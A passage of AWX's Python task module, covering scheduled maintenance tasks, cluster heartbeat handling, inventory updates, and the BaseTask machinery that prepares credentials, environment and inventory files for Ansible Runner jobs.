try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather and last_gather.value else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
if settings.IS_K8S:
return
process = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
if process.returncode != 0:
logger.debug("Cleanup execution environment images: could not get list of images")
return
if len(process.stdout) > 0:
images_system = json.loads(process.stdout)
for e in images_system:
image_name = e["Id"]
logger.debug(f"Cleanup execution environment images: deleting {image_name}")
process = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
if process.returncode != 0:
logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all())
this_inst = None
lost_instances = []
(changed, instance) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower node '{}'".format(instance.hostname))
for inst in list(instance_list):
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
elif inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.refresh_capacity()
if startup_event:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# IFF any node has a greater version than we do, then we'll shutdown services
for other_inst in instance_list:
if other_inst.version == "":
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisioning is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.capacity = 0
other_inst.save(update_fields=['capacity'])
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.modified))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
pass
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
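# Decorator for BaseTask.run(): whatever happens inside the wrapped call, remove
# every temporary file or directory collected in self.cleanup_paths afterwards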
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
self.job_created = None
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
path = os.path.split(private_data_dir)[0]
with open(path + '/auth.json', 'w') as authfile:
os.chmod(authfile.name, stat.S_IRUSR | stat.S_IWUSR)
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
token = "{}:{}".format(username, password)
auth_data = {'auths': {host: {'auth': b64encode(token.encode('UTF-8')).decode('UTF-8')}}}
authfile.write(json.dumps(auth_data, indent=4))
params["container_options"].append(f'--authfile={authfile.name}')
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
# Using z allows the dir to mounted by multiple containers
# Uppercase Z restricts access (in weird ways) to 1 container at a time
params['container_volume_mounts'].append(f'{this_path}:{this_path}:z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form:
{'credentials': {<awx.main.models.Credential>: <private key data>, ...}}
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
pdd_wrapper_path = tempfile.mkdtemp(prefix=f'pdd_wrapper_{instance.pk}_', dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(pdd_wrapper_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(pdd_wrapper_path)
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=pdd_wrapper_path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
# Ansible Runner requires the project folder to exist, and files will be written
# into the other folders without creating them first, so create all of them up front
for subfolder in ('project', 'inventory', 'env'):
runner_subfolder = os.path.join(path, subfolder)
if not os.path.exists(runner_subfolder):
os.mkdir(runner_subfolder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=os.path.join(private_data_dir, 'env'))
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
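# When Jinja is not allowed unconditionally, safe_dump() from awx.main.utils.safe_yaml
# tags values outside of safe_dict as !unsafe so Ansible treats them as literal
# strings rather than templates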
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError('The project could not sync because there is no Execution Environment.')
ee_cred = self.instance.execution_environment.credential
if ee_cred:
verify_ssl = ee_cred.get_input('verify_ssl')
if not verify_ssl:
pdd_wrapper_path = os.path.split(private_data_dir)[0]
registries_conf_path = os.path.join(pdd_wrapper_path, 'registries.conf')
host = ee_cred.get_input('host')
with open(registries_conf_path, 'w') as registries_conf:
os.chmod(registries_conf.name, stat.S_IRUSR | stat.S_IWUSR)
lines = [
'[[registry]]',
'location = "{}"'.format(host),
'insecure = true',
]
registries_conf.write('\n'.join(lines))
# Podman >= 3.1.0
env['CONTAINERS_REGISTRIES_CONF'] = registries_conf_path
# Podman < 3.1.0
env['REGISTRIES_CONFIG_PATH'] = registries_conf_path
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
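# For illustration, the resulting map might look like
# {'web01.example.org': 42, 'db01.example.org': 43} (hypothetical hostnames and Host ids)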
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
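# Timeout precedence, as implemented below: an instance-level timeout wins over the
# global setting, 0 falls back to the global value, and a negative value disables
# the timeout entirely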
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
event_data['job_created'] = self.job_created
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
# keep a reference as self.instance because of the update_model pattern and because it's used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
self.job_created = str(self.instance.created)
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# store a record of the venv used at runtime
if hasattr(self.instance, 'custom_virtualenv'):
self.update_model(pk, custom_virtualenv=getattr(self.instance, 'ansible_virtualenv_path', settings.ANSIBLE_VENV_PATH))
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
res = ansible_runner.interface.run(
project_dir=settings.BASE_DIR,
event_handler=self.event_handler,
finished_callback=self.finished_callback,
status_handler=self.status_handler,
**params,
)
else:
receptor_job = AWXReceptorJob(self, params)
self.unit_id = receptor_job.unit_id
res = receptor_job.run()
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except InvalidVirtualenvError as e:
extra_update_fields['job_explanation'] = e.message
logger.error('{} {}'.format(self.instance.log_format, e.message))
except Exception:
# this could catch programming or file system errors
